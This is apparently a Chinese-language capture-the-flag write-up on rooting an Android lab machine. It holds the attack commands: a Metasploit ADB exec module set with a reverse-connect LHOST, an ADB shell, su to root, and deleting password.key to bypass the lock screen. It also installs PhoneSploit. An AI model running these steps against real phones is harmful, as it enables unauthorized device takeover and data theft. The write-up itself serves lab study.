nmap扫描存活主机和端口,发现开放了5555、8080、22000端口
访问8080端口如下:
Good Hackers ? means
we drop here our backdoor for access
If you r Smart Dan find Backdoor access...and safe your machine
we like POST things only.
扫目录发现.htaccess
和backdoor.php
,但是并没有啥用🥱
接着尝试一下其他办法(PHP CLI
和Dropbear
),搜索对应漏洞没有发现可利用的
然后来看5555端口即adb,可直接利用msf模块来打远程命令执行漏洞,但是它没有返回session也就没啥用了
use exploit/android/adb/adb_server_exec
set RHOSTS 192.168.150.157
set LHOST 192.168.150.128
set LPORT 3333
于是尝试直接adb成功连接拿到shell,su提权得到flag:ANDROID{u_GOT_root_buddy}
adb connect 192.168.150.157
adb devices
adb shell
adb shell screencap -p /sdcard/screen.png
adb pull /sdcard/screen.png
有了root权限后我们就可以直接绕过锁屏密码,在/data/system
目录下有个password.key
,直接将其删除即可无密码登录
再来试试Phonesploit,安装和使用命令如下:
apt install adb
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
python3 phonesploit.py
它也和adb一样能进行截图等操作
小记写在最后面:就是这么一个简单的靶机其实花了我很长时间,一开始如下图所示处于offline的状态😒设置了禁止远程adb?
然后nc上去随便发个包看看,啥也不是🥲G
后面重启了下adb然后重启kali,再重启靶机,不知道试了多少次才成功了~
最后一次更新于2023-01-26
0 条评论